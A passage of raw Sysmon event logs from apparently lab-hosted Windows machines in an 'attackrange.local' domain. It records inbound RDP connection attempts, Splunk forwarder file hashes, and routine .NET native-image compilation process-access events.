AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57537-false52.114.77.33-443https 354300x800000000000000074989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.754{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com52542-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000074988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.737{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local61146- 354300x800000000000000074987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.441{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-33920-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000074986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.085{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com50241-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000074985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.124{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71071CFAB1F8FADE6074A4616007B14C,SHA256=49E94F6684123AF31B881139838456FC65AD4DE0D9A537B443B764DA329695BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.124{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D16620AFA3A913ECDD1E01D355AD4734,SHA256=6D575F76BF47EF7CA54E6EFDD5B368E01DEF3F373665E30EE0DE7AD7C9297ADF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.077{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDE-607E-E40C-00000000BB01}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.061{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDE-607E-E40C-00000000BB01}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.061{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDE-607E-E40C-00000000BB01}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000050288Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:31.056{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63775-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050287Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:34.302{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26676294B13DD18526ED77083514B9EC,SHA256=951138994A18E309408EFBDA087FCCB0C776278CBEF571F64FB5ECE5DDECB4E9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000075091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.967{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-F90C-00000000BB01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.952{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-F90C-00000000BB01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.952{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDF-607E-F90C-00000000BB01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.920{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-F80C-00000000BB01}6524C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.905{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-F80C-00000000BB01}6524C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.905{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDF-607E-F80C-00000000BB01}6524C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.858{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-F70C-00000000BB01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.842{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-F70C-00000000BB01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.842{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDF-607E-F70C-00000000BB01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.811{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-F60C-00000000BB01}5000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.795{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-F60C-00000000BB01}5000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.795{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDF-607E-F60C-00000000BB01}5000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.686{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-F50C-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.670{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-F50C-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.670{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDF-607E-F50C-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.639{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-F40C-00000000BB01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.624{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-F40C-00000000BB01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 